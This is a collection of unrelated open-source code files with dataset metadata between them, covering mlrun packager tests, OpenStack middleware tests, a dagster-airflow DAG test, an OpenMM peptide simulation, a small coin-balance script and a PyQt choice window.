ax.set_xlabel('x(t) [AU]', fontsize = 15)
ax.set_ylabel('y(t) [AU]', fontsize = 15)
ax.set_title('Planet Earth orbiting 2 times around the Sun', fontsize = 16)
ax.legend(loc='center', fontsize = 14)
ax.tick_params(labelsize = 14)
plt.show()
| abjurste/A19-FYS4150 | Project5/Project5g.py | Project5g.py | py | 7,275 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": ... |
22355127515 | import ast
import os
import pathlib
import tempfile
from typing import Tuple
from mlrun import MLClientCtx
from mlrun.package.packagers.python_standard_library_packagers import (
BoolPackager,
BytearrayPackager,
BytesPackager,
DictPackager,
FloatPackager,
FrozensetPackager,
IntPackager,
ListPackager,
NonePackager,
PathPackager,
SetPackager,
StrPackager,
TuplePackager,
)
from mlrun.package.utils import ArchiveSupportedFormat, StructFileSupportedFormat
from tests.package.packager_tester import (
COMMON_OBJECT_INSTRUCTIONS,
PackagerTester,
PackTest,
PackToUnpackTest,
UnpackTest,
)
# ----------------------------------------------------------------------------------------------------------------------
# builtins packagers:
# ----------------------------------------------------------------------------------------------------------------------
NoneType = type(None) # TODO: Replace with types.NoneType from python 3.10
def pack_none() -> NoneType:
return None
def validate_none(result: NoneType) -> bool:
# TODO: None values should not be casted to strings when casted to results, once it is implemented in
# 'execution._cast_result`, change this validation to `return result is None`.
return result == "None"
class NonePackagerTester(PackagerTester):
"""
A tester for the `NonePackager`.
"""
PACKAGER_IN_TEST = NonePackager()
TESTS = [
PackTest(
pack_handler="pack_none",
log_hint="my_result",
validation_function=validate_none,
),
PackToUnpackTest(
pack_handler="pack_none",
log_hint="my_result",
),
]
_INT_SAMPLE = 7
def pack_int() -> int:
return _INT_SAMPLE
def validate_int(result: int) -> bool:
return result == _INT_SAMPLE
def unpack_int(obj: int):
assert isinstance(obj, int)
assert obj == _INT_SAMPLE
class IntPackagerTester(PackagerTester):
"""
A tester for the `IntPackager`.
"""
PACKAGER_IN_TEST = IntPackager()
TESTS = [
PackTest(
pack_handler="pack_int",
log_hint="my_result",
validation_function=validate_int,
),
PackToUnpackTest(
pack_handler="pack_int",
log_hint="my_result",
),
PackToUnpackTest(
pack_handler="pack_int",
log_hint="my_result: object",
expected_instructions={
**COMMON_OBJECT_INSTRUCTIONS,
"object_module_name": int.__module__,
},
unpack_handler="unpack_int",
),
]
_FLOAT_SAMPLE = 0.97123
def pack_float() -> float:
return _FLOAT_SAMPLE
def validate_float(result: float) -> bool:
return result == _FLOAT_SAMPLE
def unpack_float(obj: float):
assert isinstance(obj, float)
assert obj == _FLOAT_SAMPLE
class FloatPackagerTester(PackagerTester):
"""
A tester for the `FloatPackager`.
"""
PACKAGER_IN_TEST = FloatPackager()
TESTS = [
PackTest(
pack_handler="pack_float",
log_hint="my_result",
validation_function=validate_float,
),
PackToUnpackTest(
pack_handler="pack_float",
log_hint="my_result",
),
PackToUnpackTest(
pack_handler="pack_float",
log_hint="my_result: object",
expected_instructions={
**COMMON_OBJECT_INSTRUCTIONS,
"object_module_name": float.__module__,
},
unpack_handler="unpack_float",
),
]
_BOOL_SAMPLE = True
def pack_bool() -> float:
return _BOOL_SAMPLE
def validate_bool(result: bool) -> bool:
return result is _BOOL_SAMPLE
def unpack_bool(obj: bool):
assert isinstance(obj, bool)
assert obj is _BOOL_SAMPLE
class BoolPackagerTester(PackagerTester):
"""
A tester for the `BoolPackager`.
"""
PACKAGER_IN_TEST = BoolPackager()
TESTS = [
PackTest(
pack_handler="pack_bool",
log_hint="my_result",
validation_function=validate_bool,
),
PackToUnpackTest(
pack_handler="pack_bool",
log_hint="my_result",
),
PackToUnpackTest(
pack_handler="pack_bool",
log_hint="my_result: object",
expected_instructions={
**COMMON_OBJECT_INSTRUCTIONS,
"object_module_name": bool.__module__,
},
unpack_handler="unpack_bool",
),
]
_STR_RESULT_SAMPLE = "I'm a string."
_STR_FILE_SAMPLE = "Something written in a file..."
_STR_DIRECTORY_FILES_SAMPLE = "I'm text file number {}"
def pack_str() -> str:
return _STR_RESULT_SAMPLE
def pack_str_path_file(context: MLClientCtx) -> str:
file_path = os.path.join(context.artifact_path, "my_file.txt")
with open(file_path, "w") as file:
file.write(_STR_FILE_SAMPLE)
return file_path
def pack_str_path_directory(context: MLClientCtx) -> str:
directory_path = os.path.join(context.artifact_path, "my_directory")
os.makedirs(directory_path)
for i in range(5):
with open(os.path.join(directory_path, f"file_{i}.txt"), "w") as file:
file.write(_STR_DIRECTORY_FILES_SAMPLE.format(i))
return directory_path
def validate_str_result(result: str) -> bool:
return result == _STR_RESULT_SAMPLE
def unpack_str(obj: str):
assert isinstance(obj, str)
assert obj == _STR_RESULT_SAMPLE
def unpack_str_path_file(obj: str):
assert isinstance(obj, str)
with open(obj, "r") as file:
file_content = file.read()
assert file_content == _STR_FILE_SAMPLE
def unpack_str_path_directory(obj: str):
assert isinstance(obj, str)
for i in range(5):
with open(os.path.join(obj, f"file_{i}.txt"), "r") as file:
file_content = file.read()
assert file_content == _STR_DIRECTORY_FILES_SAMPLE.format(i)
def prepare_str_path_file() -> Tuple[str, str]:
temp_directory = tempfile.mkdtemp()
file_path = os.path.join(temp_directory, "my_file.txt")
with open(file_path, "w") as file:
file.write(_STR_FILE_SAMPLE)
return file_path, temp_directory
class StrPackagerTester(PackagerTester):
"""
A tester for the `StrPackager`.
"""
PACKAGER_IN_TEST = StrPackager()
TESTS = [
PackTest(
pack_handler="pack_str",
log_hint="my_result",
validation_function=validate_str_result,
pack_parameters={},
),
UnpackTest(
prepare_input_function=prepare_str_path_file,
unpack_handler="unpack_str_path_file",
),
PackToUnpackTest(
pack_handler="pack_str",
log_hint="my_result",
),
PackToUnpackTest(
pack_handler="pack_str",
log_hint="my_result: object",
expected_instructions={
**COMMON_OBJECT_INSTRUCTIONS,
"object_module_name": str.__module__,
},
unpack_handler="unpack_str",
),
PackToUnpackTest(
pack_handler="pack_str_path_file",
log_hint="my_file: path",
expected_instructions={"is_directory": False},
unpack_handler="unpack_str_path_file",
),
*[
PackToUnpackTest(
pack_handler="pack_str_path_directory",
log_hint={
"key": "my_dir",
"artifact_type": "path",
"archive_format": archive_format,
},
expected_instructions={
"is_directory": True,
"archive_format": archive_format,
},
unpack_handler="unpack_str_path_directory",
)
for archive_format in ArchiveSupportedFormat.get_all_formats()
],
]
_DICT_SAMPLE = {"a1": {"a2": [1, 2, 3], "b2": [4, 5, 6]}, "b1": {"b2": [4, 5, 6]}}
def pack_dict() -> dict:
return _DICT_SAMPLE
def unpack_dict(obj: dict):
assert isinstance(obj, dict)
assert obj == _DICT_SAMPLE
def validate_dict_result(result: dict) -> bool:
return result == _DICT_SAMPLE
def prepare_dict_file(file_format: str) -> Tuple[str, str]:
temp_directory = tempfile.mkdtemp()
file_path = os.path.join(temp_directory, f"my_file.{file_format}")
formatter = StructFileSupportedFormat.get_format_handler(fmt=file_format)
formatter.write(obj=_DICT_SAMPLE, file_path=file_path)
return file_path, temp_directory
class DictPackagerTester(PackagerTester):
"""
A tester for the `DictPackager`.
"""
PACKAGER_IN_TEST = DictPackager()
TESTS = [
PackTest(
pack_handler="pack_dict",
log_hint="my_dict",
validation_function=validate_dict_result,
),
*[
UnpackTest(
prepare_input_function=prepare_dict_file,
unpack_handler="unpack_dict",
prepare_parameters={"file_format": file_format},
)
for file_format in StructFileSupportedFormat.get_all_formats()
],
PackToUnpackTest(
pack_handler="pack_dict",
log_hint="my_dict",
),
PackToUnpackTest(
pack_handler="pack_dict",
log_hint="my_dict: object",
expected_instructions={
**COMMON_OBJECT_INSTRUCTIONS,
"object_module_name": dict.__module__,
},
unpack_handler="unpack_dict",
),
*[
PackToUnpackTest(
pack_handler="pack_dict",
log_hint={
"key": "my_dict",
"artifact_type": "file",
"file_format": file_format,
},
expected_instructions={
"file_format": file_format,
},
unpack_handler="unpack_dict",
)
for file_format in StructFileSupportedFormat.get_all_formats()
],
]
_LIST_SAMPLE = [1, 2, 3, {"a": 1, "b": 2}]
def pack_list() -> list:
return _LIST_SAMPLE
def unpack_list(obj: list):
assert isinstance(obj, list)
assert obj == _LIST_SAMPLE
def validate_list_result(result: list) -> bool:
return result == _LIST_SAMPLE
def prepare_list_file(file_format: str) -> Tuple[str, str]:
temp_directory = tempfile.mkdtemp()
file_path = os.path.join(temp_directory, f"my_file.{file_format}")
formatter = StructFileSupportedFormat.get_format_handler(fmt=file_format)
formatter.write(obj=_LIST_SAMPLE, file_path=file_path)
return file_path, temp_directory
class ListPackagerTester(PackagerTester):
"""
A tester for the `ListPackager`.
"""
PACKAGER_IN_TEST = ListPackager()
TESTS = [
PackTest(
pack_handler="pack_list",
log_hint="my_list",
validation_function=validate_list_result,
),
*[
UnpackTest(
prepare_input_function=prepare_list_file,
unpack_handler="unpack_list",
prepare_parameters={"file_format": file_format},
)
for file_format in StructFileSupportedFormat.get_all_formats()
],
PackToUnpackTest(
pack_handler="pack_list",
log_hint="my_list",
),
PackToUnpackTest(
pack_handler="pack_list",
log_hint="my_list: object",
expected_instructions={
**COMMON_OBJECT_INSTRUCTIONS,
"object_module_name": tuple.__module__,
},
unpack_handler="unpack_list",
),
*[
PackToUnpackTest(
pack_handler="pack_list",
log_hint={
"key": "my_list",
"artifact_type": "file",
"file_format": file_format,
},
expected_instructions={
"file_format": file_format,
},
unpack_handler="unpack_list",
)
for file_format in StructFileSupportedFormat.get_all_formats()
],
]
_TUPLE_SAMPLE = (1, 2, 3)
def pack_tuple() -> tuple:
return _TUPLE_SAMPLE
def unpack_tuple(obj: tuple):
assert isinstance(obj, tuple)
assert obj == _TUPLE_SAMPLE
def validate_tuple_result(result: list) -> bool:
# Tuples are serialized as lists:
return tuple(result) == _TUPLE_SAMPLE
def prepare_tuple_file(file_format: str) -> Tuple[str, str]:
temp_directory = tempfile.mkdtemp()
file_path = os.path.join(temp_directory, f"my_file.{file_format}")
formatter = StructFileSupportedFormat.get_format_handler(fmt=file_format)
formatter.write(obj=list(_TUPLE_SAMPLE), file_path=file_path)
return file_path, temp_directory
class TuplePackagerTester(PackagerTester):
"""
A tester for the `TuplePackager`.
"""
PACKAGER_IN_TEST = TuplePackager()
TESTS = [
PackTest(
pack_handler="pack_tuple",
log_hint="my_tuple",
validation_function=validate_tuple_result,
),
*[
UnpackTest(
prepare_input_function=prepare_tuple_file,
unpack_handler="unpack_tuple",
prepare_parameters={"file_format": file_format},
)
for file_format in StructFileSupportedFormat.get_all_formats()
],
PackToUnpackTest(
pack_handler="pack_tuple",
log_hint="my_tuple",
),
PackToUnpackTest(
pack_handler="pack_tuple",
log_hint="my_tuple: object",
expected_instructions={
**COMMON_OBJECT_INSTRUCTIONS,
"object_module_name": tuple.__module__,
},
unpack_handler="unpack_tuple",
),
*[
PackToUnpackTest(
pack_handler="pack_tuple",
log_hint={
"key": "my_tuple",
"artifact_type": "file",
"file_format": file_format,
},
expected_instructions={
"file_format": file_format,
},
unpack_handler="unpack_tuple",
)
for file_format in StructFileSupportedFormat.get_all_formats()
],
]
_SET_SAMPLE = {1, 2, 3}
def pack_set() -> set:
return _SET_SAMPLE
def unpack_set(obj: set):
assert isinstance(obj, set)
assert obj == _SET_SAMPLE
def validate_set_result(result: list) -> bool:
# Sets are serialized as lists:
return set(result) == _SET_SAMPLE
def prepare_set_file(file_format: str) -> Tuple[str, str]:
temp_directory = tempfile.mkdtemp()
file_path = os.path.join(temp_directory, f"my_file.{file_format}")
formatter = StructFileSupportedFormat.get_format_handler(fmt=file_format)
formatter.write(obj=list(_SET_SAMPLE), file_path=file_path)
return file_path, temp_directory
class SetPackagerTester(PackagerTester):
"""
A tester for the `SetPackager`.
"""
PACKAGER_IN_TEST = SetPackager()
TESTS = [
PackTest(
pack_handler="pack_set",
log_hint="my_set",
validation_function=validate_set_result,
),
*[
UnpackTest(
prepare_input_function=prepare_set_file,
unpack_handler="unpack_set",
prepare_parameters={"file_format": file_format},
)
for file_format in StructFileSupportedFormat.get_all_formats()
],
PackToUnpackTest(
pack_handler="pack_set",
log_hint="my_set",
),
PackToUnpackTest(
pack_handler="pack_set",
log_hint="my_set: object",
expected_instructions={
**COMMON_OBJECT_INSTRUCTIONS,
"object_module_name": set.__module__,
},
unpack_handler="unpack_set",
),
*[
PackToUnpackTest(
pack_handler="pack_set",
log_hint={
"key": "my_set",
"artifact_type": "file",
"file_format": file_format,
},
expected_instructions={
"file_format": file_format,
},
unpack_handler="unpack_set",
)
for file_format in StructFileSupportedFormat.get_all_formats()
],
]
_FROZENSET_SAMPLE = frozenset([1, 2, 3])
def pack_frozenset() -> frozenset:
return _FROZENSET_SAMPLE
def unpack_frozenset(obj: frozenset):
assert isinstance(obj, frozenset)
assert obj == _FROZENSET_SAMPLE
def validate_frozenset_result(result: list) -> bool:
# Frozen sets are serialized as lists:
return frozenset(result) == _FROZENSET_SAMPLE
def prepare_frozenset_file(file_format: str) -> Tuple[str, str]:
temp_directory = tempfile.mkdtemp()
file_path = os.path.join(temp_directory, f"my_file.{file_format}")
formatter = StructFileSupportedFormat.get_format_handler(fmt=file_format)
formatter.write(obj=list(_FROZENSET_SAMPLE), file_path=file_path)
return file_path, temp_directory
class FrozensetPackagerTester(PackagerTester):
"""
A tester for the `FrozensetPackager`.
"""
PACKAGER_IN_TEST = FrozensetPackager()
TESTS = [
PackTest(
pack_handler="pack_frozenset",
log_hint="my_frozenset",
validation_function=validate_frozenset_result,
),
*[
UnpackTest(
prepare_input_function=prepare_frozenset_file,
unpack_handler="unpack_frozenset",
prepare_parameters={"file_format": file_format},
)
for file_format in StructFileSupportedFormat.get_all_formats()
],
PackToUnpackTest(
pack_handler="pack_frozenset",
log_hint="my_frozenset",
),
PackToUnpackTest(
pack_handler="pack_frozenset",
log_hint="my_frozenset: object",
expected_instructions={
**COMMON_OBJECT_INSTRUCTIONS,
"object_module_name": set.__module__,
},
unpack_handler="unpack_frozenset",
),
*[
PackToUnpackTest(
pack_handler="pack_frozenset",
log_hint={
"key": "my_frozenset",
"artifact_type": "file",
"file_format": file_format,
},
expected_instructions={
"file_format": file_format,
},
unpack_handler="unpack_frozenset",
)
for file_format in StructFileSupportedFormat.get_all_formats()
],
]
_BYTEARRAY_SAMPLE = bytearray([1, 2, 3])
def pack_bytearray() -> bytearray:
return _BYTEARRAY_SAMPLE
def unpack_bytearray(obj: bytearray):
assert isinstance(obj, bytearray)
assert obj == _BYTEARRAY_SAMPLE
def validate_bytearray_result(result: str) -> bool:
# Byte arrays are serialized as strings (not decoded):
return bytearray(ast.literal_eval(result)) == _BYTEARRAY_SAMPLE
def prepare_bytearray_file(file_format: str) -> Tuple[str, str]:
temp_directory = tempfile.mkdtemp()
file_path = os.path.join(temp_directory, f"my_file.{file_format}")
formatter = StructFileSupportedFormat.get_format_handler(fmt=file_format)
formatter.write(obj=list(_BYTEARRAY_SAMPLE), file_path=file_path)
return file_path, temp_directory
class BytearrayPackagerTester(PackagerTester):
"""
A tester for the `BytearrayPackager`.
"""
PACKAGER_IN_TEST = BytearrayPackager()
TESTS = [
PackTest(
pack_handler="pack_bytearray",
log_hint="my_bytearray",
validation_function=validate_bytearray_result,
),
*[
UnpackTest(
prepare_input_function=prepare_bytearray_file,
unpack_handler="unpack_bytearray",
prepare_parameters={"file_format": file_format},
)
for file_format in StructFileSupportedFormat.get_all_formats()
],
PackToUnpackTest(
pack_handler="pack_bytearray",
log_hint="my_bytearray",
),
PackToUnpackTest(
pack_handler="pack_bytearray",
log_hint="my_bytearray: object",
expected_instructions={
**COMMON_OBJECT_INSTRUCTIONS,
"object_module_name": set.__module__,
},
unpack_handler="unpack_bytearray",
),
*[
PackToUnpackTest(
pack_handler="pack_bytearray",
log_hint={
"key": "my_bytearray",
"artifact_type": "file",
"file_format": file_format,
},
expected_instructions={
"file_format": file_format,
},
unpack_handler="unpack_bytearray",
)
for file_format in StructFileSupportedFormat.get_all_formats()
],
]
_BYTES_SAMPLE = b"I'm a byte string."
def pack_bytes() -> bytes:
return _BYTES_SAMPLE
def unpack_bytes(obj: bytes):
assert isinstance(obj, bytes)
assert obj == _BYTES_SAMPLE
def validate_bytes_result(result: str) -> bool:
# Bytes are serialized as strings (not decoded):
return ast.literal_eval(result) == _BYTES_SAMPLE
def prepare_bytes_file(file_format: str) -> Tuple[str, str]:
temp_directory = tempfile.mkdtemp()
file_path = os.path.join(temp_directory, f"my_file.{file_format}")
formatter = StructFileSupportedFormat.get_format_handler(fmt=file_format)
formatter.write(obj=list(_BYTES_SAMPLE), file_path=file_path)
return file_path, temp_directory
class BytesPackagerTester(PackagerTester):
"""
A tester for the `BytesPackager`.
"""
PACKAGER_IN_TEST = BytesPackager()
TESTS = [
PackTest(
pack_handler="pack_bytes",
log_hint="my_bytes",
validation_function=validate_bytes_result,
),
*[
UnpackTest(
prepare_input_function=prepare_bytes_file,
unpack_handler="unpack_bytes",
prepare_parameters={"file_format": file_format},
)
for file_format in StructFileSupportedFormat.get_all_formats()
],
PackToUnpackTest(
pack_handler="pack_bytes",
log_hint="my_bytes",
),
PackToUnpackTest(
pack_handler="pack_bytes",
log_hint="my_bytes: object",
expected_instructions={
**COMMON_OBJECT_INSTRUCTIONS,
"object_module_name": set.__module__,
},
unpack_handler="unpack_bytes",
),
*[
PackToUnpackTest(
pack_handler="pack_bytes",
log_hint={
"key": "my_bytes",
"artifact_type": "file",
"file_format": file_format,
},
expected_instructions={
"file_format": file_format,
},
unpack_handler="unpack_bytes",
)
for file_format in StructFileSupportedFormat.get_all_formats()
],
]
# ----------------------------------------------------------------------------------------------------------------------
# pathlib packagers:
# ----------------------------------------------------------------------------------------------------------------------
_PATH_RESULT_SAMPLE = pathlib.Path("I'm a path.")
def pack_path() -> pathlib.Path:
return _PATH_RESULT_SAMPLE
def pack_path_file(context: MLClientCtx) -> pathlib.Path:
file_path = pathlib.Path(context.artifact_path) / "my_file.txt"
with open(file_path, "w") as file:
file.write(_STR_FILE_SAMPLE)
return file_path
def pack_path_directory(context: MLClientCtx) -> pathlib.Path:
directory_path = pathlib.Path(context.artifact_path) / "my_directory"
os.makedirs(directory_path)
for i in range(5):
with open(directory_path / f"file_{i}.txt", "w") as file:
file.write(_STR_DIRECTORY_FILES_SAMPLE.format(i))
return directory_path
def validate_path_result(result: pathlib.Path) -> bool:
return pathlib.Path(result) == _PATH_RESULT_SAMPLE
def unpack_path(obj: pathlib.Path):
assert isinstance(obj, pathlib.Path)
assert obj == _PATH_RESULT_SAMPLE
def unpack_path_file(obj: pathlib.Path):
assert isinstance(obj, pathlib.Path)
with open(obj, "r") as file:
file_content = file.read()
assert file_content == _STR_FILE_SAMPLE
def unpack_path_directory(obj: pathlib.Path):
assert isinstance(obj, pathlib.Path)
for i in range(5):
with open(obj / f"file_{i}.txt", "r") as file:
file_content = file.read()
assert file_content == _STR_DIRECTORY_FILES_SAMPLE.format(i)
class PathPackagerTester(PackagerTester):
"""
A tester for the `PathPackager`.
"""
PACKAGER_IN_TEST = PathPackager()
TESTS = [
PackTest(
pack_handler="pack_path",
log_hint="my_result: result",
validation_function=validate_path_result,
pack_parameters={},
),
UnpackTest(
prepare_input_function=prepare_str_path_file, # Using str preparing method - same thing
unpack_handler="unpack_path_file",
),
PackToUnpackTest(
pack_handler="pack_path",
log_hint="my_result: result",
),
PackToUnpackTest(
pack_handler="pack_path",
log_hint="my_result: object",
expected_instructions={
**COMMON_OBJECT_INSTRUCTIONS,
"object_module_name": pathlib.Path.__module__,
},
unpack_handler="unpack_path",
),
PackToUnpackTest(
pack_handler="pack_path_file",
log_hint="my_file",
expected_instructions={"is_directory": False},
unpack_handler="unpack_path_file",
),
*[
PackToUnpackTest(
pack_handler="pack_path_directory",
log_hint={
"key": "my_dir",
"archive_format": archive_format,
},
expected_instructions={
"is_directory": True,
"archive_format": archive_format,
},
unpack_handler="unpack_path_directory",
)
for archive_format in ArchiveSupportedFormat.get_all_formats()
],
]
| mlrun/mlrun | tests/package/packagers_testers/python_standard_library_packagers_testers.py | python_standard_library_packagers_testers.py | py | 27,189 | python | en | code | 1,129 | github-code | 36 | [
{
"api_name": "tests.package.packager_tester.PackagerTester",
"line_number": 50,
"usage_type": "name"
},
{
"api_name": "mlrun.package.packagers.python_standard_library_packagers.NonePackager",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "tests.package.packager_tester... |
40851263636 | import json
def help():
helpprint = print("""
addcoins: plus Your coins.
minuscoins: minus Your coins.
help: shows this list.
coins: Shows how many coins do you have
""")
main()
def checkbalance():
with open('coins.json','r') as f:
get_balance = json.loads(f.read())
print(f"You Have {get_balance['coins']} coins")
main()
def addcoins():
addcoins = get_balance()
coinamt = int(input("Enter a amount to add coins: "))
addcoins['coins'] += coinamt
with open('coins.json', 'w') as f:
json.dump(addcoins, f)
print("Add sucessfull")
main()
def minuscoins():
minuscoins = get_balance()
coinamt = int(input("Enter a amount to minus coins: "))
minuscoins['coins'] -= coinamt
with open('coins.json', 'w') as f:
json.dump(minuscoins, f)
print("Minus sucessfull")
main()
def get_balance():
with open('coins.json','r') as f:
users = json.load(f)
return users
def main():
mainFunction = input("Input a Command(Type help for help): ")
if mainFunction == "help":
help()
elif mainFunction == "coins":
checkbalance()
elif mainFunction == "addcoins":
addcoins()
elif mainFunction == "minuscoins":
minuscoins()
else:
print("Command Not Found")
main()
main()
| hahayeslol12/CoinScript | main.py | main.py | py | 1,455 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.loads",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 42,
... |
29654851332 | """ A python program that scrapes news articles, classifies their sentiment, and creates a time series of sentiment over time """
import os
import openai
# Set OpenAI API key from environment
openai.api_key = os.environ.get('OPENAI_API_KEY', '')
def classify(query, search_model="ada", model="davinci"):
openai.Classification.create(
search_model=search_model,
model=model,
examples=[
[""],
[""],
[""],
[""],
],
query=query,
labels=[
"Very Positive",
"Mostly Positive",
"Neutral",
"Mostly Negative"
"Very Negative",
]
)
if __name__ == "__main__":
print(openai.Model.list()) | candiceevemiller/company-sentiment-analysis | main.py | main.py | py | 752 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "openai.api_key",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "os.environ.get",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "openai.Classification... |
74470182182 | import unittest
import mock
import openstack.common.context
from openstack.common.middleware import context
class ContextMiddlewareTest(unittest.TestCase):
def test_process_request(self):
req = mock.Mock()
app = mock.Mock()
options = mock.MagicMock()
ctx = mock.sentinel.context
with mock.patch.object(context.ContextMiddleware,
'make_context',
mock.Mock(return_value=ctx)):
ctx_middleware = context.ContextMiddleware(app, options)
ctx_middleware.process_request(req)
self.assertEqual(req.context, ctx)
def test_make_context(self):
app = mock.Mock()
options = mock.MagicMock()
with mock.patch.object(openstack.common.context.RequestContext,
'__init__',
mock.Mock(return_value=None)) as init:
ctx_middleware = context.ContextMiddleware(app, options)
ctx_middleware.make_context(mock.sentinel.arg)
init.assert_called_with(mock.sentinel.arg)
def test_make_explicit_context(self):
app = mock.Mock()
import_class = mock.Mock()
options = {'context_class': mock.sentinel.context_class}
with mock.patch('openstack.common.utils.import_class',
mock.Mock(return_value=import_class)):
ctx_middleware = context.ContextMiddleware(app, options)
ctx_middleware.make_context(mock.sentinel.arg)
import_class.assert_called_with(mock.sentinel.arg)
class FilterFactoryTest(unittest.TestCase):
def test_filter_factory(self):
global_conf = dict(sentinel=mock.sentinel.global_conf)
app = mock.sentinel.app
target = 'openstack.common.middleware.context.ContextMiddleware'
def check_ctx_middleware(arg_app, arg_conf):
self.assertEqual(app, arg_app)
self.assertEqual(global_conf['sentinel'], arg_conf['sentinel'])
return mock.DEFAULT
with mock.patch(target,
mock.Mock(return_value=mock.sentinel.ctx)) as mid:
mid.side_effect = check_ctx_middleware
filter = context.filter_factory(global_conf)
self.assertEqual(filter(app), mock.sentinel.ctx)
| emonty/openstack-common | tests/unit/middleware/test_context.py | test_context.py | py | 2,329 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "mock.Mock",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "mock.Mock",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "mock.MagicMock",
"line... |
494409517 | # pylint doesn't understand pytest fixtures
# pylint: disable=unused-argument
from click.testing import CliRunner
from dagster_airflow.cli import scaffold
def test_build_dags(clean_airflow_home):
'''This test generates Airflow DAGs for several pipelines in examples/toys and writes those DAGs
to $AIRFLOW_HOME/dags.
By invoking DagBag() below, an Airflow DAG refresh is triggered. If there are any failures in
DAG parsing, DagBag() will add an entry to its import_errors property.
By exercising this path, we ensure that our codegen continues to generate valid Airflow DAGs,
and that Airflow is able to successfully parse our DAGs.
'''
runner = CliRunner()
cli_args_to_test = [
['--module-name', 'dagster_examples.toys.log_spew', '--pipeline-name', 'log_spew'],
['--module-name', 'dagster_examples.toys.many_events', '--pipeline-name', 'many_events'],
[
'--module-name',
'dagster_examples.toys.error_monster',
'--pipeline-name',
'error_monster',
'--preset',
'passing',
],
[
'--module-name',
'dagster_examples.toys.resources',
'--pipeline-name',
'resource_pipeline',
],
['--module-name', 'dagster_examples.toys.sleepy', '--pipeline-name', 'sleepy_pipeline'],
]
for args in cli_args_to_test:
runner.invoke(scaffold, args)
# This forces Airflow to refresh DAGs; see https://stackoverflow.com/a/50356956/11295366
from airflow.models import DagBag
dag_bag = DagBag()
# If Airflow hits an import error, it will add an entry to this dict.
assert not dag_bag.import_errors
assert args[-1] in dag_bag.dags
| helloworld/continuous-dagster | deploy/dagster_modules/dagster-airflow/dagster_airflow_tests/test_build_dags.py | test_build_dags.py | py | 1,760 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "click.testing.CliRunner",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "dagster_airflow.cli.scaffold",
"line_number": 41,
"usage_type": "argument"
},
{
"api_name": "airflow.models.DagBag",
"line_number": 46,
"usage_type": "call"
}
] |
10315136743 | from __future__ import print_function
import sys
import mdtraj as md
from simtk.openmm import app
import simtk.openmm as mm
from simtk import unit
import argparse
class Tee(object):
def __init__(self, name, mode):
self.file = open(name, mode)
self.stdout = sys.stdout
def write(self, data):
self.file.write(data)
self.stdout.write(data)
if __name__ == '__main__':
if len(sys.argv) != 3:
print('usage %s <trajectory index (for output file)> <model index of starting conformation>')
exit(1)
pdb = md.load('100-fs-peptide-400K.pdb')
forcefield = app.ForceField('amber99sbildn.xml', 'amber99_obc.xml')
system = forcefield.createSystem(pdb.topology.to_openmm(), nonbondedMethod=app.CutoffNonPeriodic,
nonbondedCutoff=1.0*unit.nanometers, constraints=app.HBonds)
integrator = mm.LangevinIntegrator(300*unit.kelvin, 91.0/unit.picoseconds,
2.0*unit.femtoseconds)
integrator.setConstraintTolerance(0.00001)
platform = mm.Platform.getPlatformByName('CPU')
#properties = {'CudaPrecision': 'mixed', 'CudaDeviceIndex': sys.argv[1]}
simulation = app.Simulation(pdb.topology.to_openmm(), system, integrator, platform)
simulation.context.setPositions(pdb.xyz[int(sys.argv[2])])
simulation.context.setVelocitiesToTemperature(300*unit.kelvin)
nsteps = int((1*unit.nanoseconds) / (2*unit.femtoseconds))
interval = int((10*unit.picoseconds) / (2*unit.femtoseconds))
simulation.reporters.append(app.StateDataReporter(open('trajectory-%s.log' % sys.argv[1], 'w', 0),
interval, step=True, time=True, progress=True,
potentialEnergy=True, temperature=True, remainingTime=True,
speed=True, totalSteps=nsteps, separator='\t'))
# equilibrate
simulation.step(int(100*unit.picoseconds / (2*unit.femtoseconds)))
# now add the trajectory reporter.
simulation.reporters.append(app.DCDReporter('trajectory-%s.dcd' % sys.argv[1], interval))
simulation.step(nsteps)
| vivek-bala/adaptive-msm-openmm | entk2/fs-peptide/simulate-fs.py | simulate-fs.py | py | 2,035 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.stdout",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "mdtraj.load",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "simtk.openmm.app.ForceField... |
5134070317 | from PyQt5.QtWidgets import QListWidget, QListWidgetItem
from PyQt5.QtWidgets import QWidget, QVBoxLayout
from whispering_assistant.window_managers.windows.base_window_template import BaseWindowTemplate
class ChoiceWindow(BaseWindowTemplate):
def __init__(self, parent=None, choices=[], process_cb=None):
super().__init__(parent, choices=choices, process_cb=process_cb)
def initUI(self, choices, process_cb):
self.setWindowTitle("Select the desired link")
self.setGeometry(1000, 500, 1600, 200)
self.selected_index = None
self.choices = choices
self.process_cb = process_cb
central_widget = QWidget(self)
layout = QVBoxLayout(central_widget)
self.list_widget = QListWidget(central_widget)
for choice in choices:
display_text = choice['display_text']
list_item = QListWidgetItem(display_text)
self.list_widget.addItem(list_item)
self.list_widget.itemDoubleClicked.connect(self.on_item_double_clicked)
layout.addWidget(self.list_widget)
central_widget.setLayout(layout)
self.setCentralWidget(central_widget)
self.show()
def on_item_double_clicked(self, item):
self.selected_index = self.list_widget.row(item)
print("self.selected_index", self.selected_index, self.choices[self.selected_index])
selected_item = self.choices[self.selected_index]
if self.process_cb:
self.process_cb(selected_item)
self.close()
